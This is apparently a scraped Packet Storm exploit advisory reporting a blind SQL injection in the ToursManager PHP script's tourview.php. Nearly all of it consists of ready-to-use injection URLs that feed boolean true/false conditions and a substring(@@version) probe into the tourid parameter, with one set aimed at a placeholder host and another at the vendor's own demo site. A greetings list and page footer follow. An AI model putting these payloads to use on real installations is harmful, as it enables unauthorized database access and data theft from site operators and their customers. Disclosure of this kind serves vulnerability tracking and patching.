ToursManager suffers from a blind SQL injection vulnerability in tourview.php.
4d0862ac35c71f59549f8a0f7be83099dd4f645b32ac2abbf8e1b5cf37c106c9[>] Name:--> ToursManager PhP Script <= Blind Sql Injection
[>] Discovered by:--> XaDoS
[>] ContacT m&:--> xados[at]hotmail.it
[>] Site:--> https://www.toursmanager.com
#########
[■] £XpLoIT:
|: https://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true)
|: https://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false)
Version:
|: https://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true)
|: https://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false)
V=> 5.x.x XD
#########
[■] D&M0:
|: https://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
|: https://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
|: https://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5
#########
[■] Th4Nks T0:
\> Boom3rang </ (very kind) ;-)
\> Langy </
\> Str0ke </
#########
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed